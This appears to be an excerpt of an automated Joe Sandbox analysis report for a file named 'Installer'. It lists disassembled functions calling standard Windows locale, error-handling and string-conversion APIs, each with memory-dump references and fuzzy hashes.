                                                                                                                                                                                                                                                    Function 00361960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003619B4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: 29ce84442e4dc416c9d8c5974797f0c863784bdf5f53a5327b02055e9d17b84a
                                                                                                                                                                                                                                                    • Instruction ID: 4b8d1af0b929fafc5ae2ce0c3e53b0a7a4967cb321ed016a24b1c9435cdce569
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29ce84442e4dc416c9d8c5974797f0c863784bdf5f53a5327b02055e9d17b84a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45110232610206ABDB26AF68CC12EBB77ECEF05714B14817AF902DB141EB38ED449790
                                                                                                                                                                                                                                                    Function 00361B0D Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0036179C,00000000,00000000,?), ref: 00361B39
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: b63ef82c98fbe41100e6abf8e88027670223638db17d1b31861541fe065eb0d0
                                                                                                                                                                                                                                                    • Instruction ID: b25a90fa6b5169d45daebb15954122ab3d08cc24c61818eb5bb7738b26e52a69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b63ef82c98fbe41100e6abf8e88027670223638db17d1b31861541fe065eb0d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3101F933710112ABDB295B658C0AAFA3768EF40754F19C468ED06A7688FB70FE41C790
                                                                                                                                                                                                                                                    Function 003617D3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00361840,00000001,?,?,-00000050,?,0036132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0036181D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: 2da75450bbafa402af26dd20958f2c1fadb94864651bb77b3b4d2489a53c18c7
                                                                                                                                                                                                                                                    • Instruction ID: dbccfc4e2c720efd23bfac482c63c2eb3649b3fcdcedab90b4e3120ebc3fc3f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2da75450bbafa402af26dd20958f2c1fadb94864651bb77b3b4d2489a53c18c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F0F6362003045FDB265F79DC81A7A7B95EF80768F19C42CF9458B690D6B19C42C750
                                                                                                                                                                                                                                                    Function 0035D1BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 003580E1: EnterCriticalSection.KERNEL32(?,?,0035C5F8,?,00379290,00000008,0035C4EA,?,?,?), ref: 003580F0
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0035D1B0,00000001,00379310,0000000C,0035CB11,-00000050), ref: 0035D1F5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                                                                                                    • Opcode ID: 06f78140d4dcbaba31a4c8160792b8f0dc62ff89e60a5bd1d7d80bbf5ebe5990
                                                                                                                                                                                                                                                    • Instruction ID: 746a8e45a8df5d4132d31934b24720c6428517c594e1d8ba8bd540ffda77d85b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06f78140d4dcbaba31a4c8160792b8f0dc62ff89e60a5bd1d7d80bbf5ebe5990
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45F04F76A00204DFE722EFA8E842B9D77F0EB04721F10852AF8189B2A0CB755984CF41
                                                                                                                                                                                                                                                    Function 00361915 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00361960,00000001,?,?,?,00361385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0036194C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: 66782e1e34ddc2a44158eea8a6987990e8a8f1b7a87593e3fce562bf0776ed46
                                                                                                                                                                                                                                                    • Instruction ID: 0ad1b1f41fb376b1aacb7dc339c8f8a74d9f0dc432ac9e82158d59463c5dd5a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66782e1e34ddc2a44158eea8a6987990e8a8f1b7a87593e3fce562bf0776ed46
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F05C3530030557CB069F35CC65666BFE4EFC1B10F0B8058EA098B150C7319882C7D0
                                                                                                                                                                                                                                                    Function 0035CC15 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00356E33,?,20001004,00000000,00000002,?,?,00355D3D), ref: 0035CC49
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: 93b3baae463e7b7345c1b91ecd76e359d8b6f0b6b5ba0f860c1c0ae9b3a6d5a7
                                                                                                                                                                                                                                                    • Instruction ID: e8c1d1b9d9aa5db5439120ad00496128a742e28fa4198225e2b1c40d4d46256f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93b3baae463e7b7345c1b91ecd76e359d8b6f0b6b5ba0f860c1c0ae9b3a6d5a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56E04F3550062CBFCF232F60ED05E9E7E2AEF44B52F044021FD096A171CB318966AB90
                                                                                                                                                                                                                                                    Function 0034F8DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 0034F8E2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 564e1525d9c8bf244ae9f80eadab71dea0c6c487f823b999181de00db35699f0
                                                                                                                                                                                                                                                    • Instruction ID: 828cce61ef84633cd985c6c2526a3048e92ffb15f9f4bb9c06a3387735d1c06e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 564e1525d9c8bf244ae9f80eadab71dea0c6c487f823b999181de00db35699f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 0035D8E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                    • Opcode ID: 1cab6ee8c2880f393d6ffb062d3f73fb92e949ddddeb97ea7c35717ec54d7cd6
                                                                                                                                                                                                                                                    • Instruction ID: 138fa463590a9b864325f45e3e8d5ac23f8aacc62d3dce2b853da7d9d2bd2ae2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cab6ee8c2880f393d6ffb062d3f73fb92e949ddddeb97ea7c35717ec54d7cd6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50A00171601602CBA7628F36AA2A2493AADAA45BD1B058069A849C6168EE349494AF45
                                                                                                                                                                                                                                                    Function 0036AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                                                                                                    • Opcode ID: c220a1a011bdc3199bf0d79af33955bbeb1a5db8b6483fa8f9061a9a11600ba3
                                                                                                                                                                                                                                                    • Instruction ID: 5076cf65ebc588612f83fa1d6c84799eb5fa9aa2ee3c53fb5feb4612db0b439f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c220a1a011bdc3199bf0d79af33955bbeb1a5db8b6483fa8f9061a9a11600ba3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF710572900A096FDF239E648C51FAF77BAEF45311F2A8055E904BB295E735DC408F62
                                                                                                                                                                                                                                                    Function 0034FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0034FE70
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034FE9C
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0034FEDB
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034FEF8
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0034FF37
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034FF54
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0034FF96
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0034FFB9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
                                                                                                                                                                                                                                                    • Instruction ID: 50f55af91fd02c9c5451e34386ab74c70a058d26adf95e89798d6d107f7a4883
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65519D7260061AAFEB225F60CC45FAB7BE9EF45750F1A443AFD15DE1A0D730AC548B50
                                                                                                                                                                                                                                                    Function 0035EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction ID: 96f4aed62ae2d163a8404596f163b5eceafb0931b0bd98938af56fa7f48f2c9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AB16872A003559FDB178F24CC81FAE7BB5EF19311F1A4165EC44AF292D6749E09C7A0
                                                                                                                                                                                                                                                    Function 00350D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350D77
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00350D7F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E08
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00350E33
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
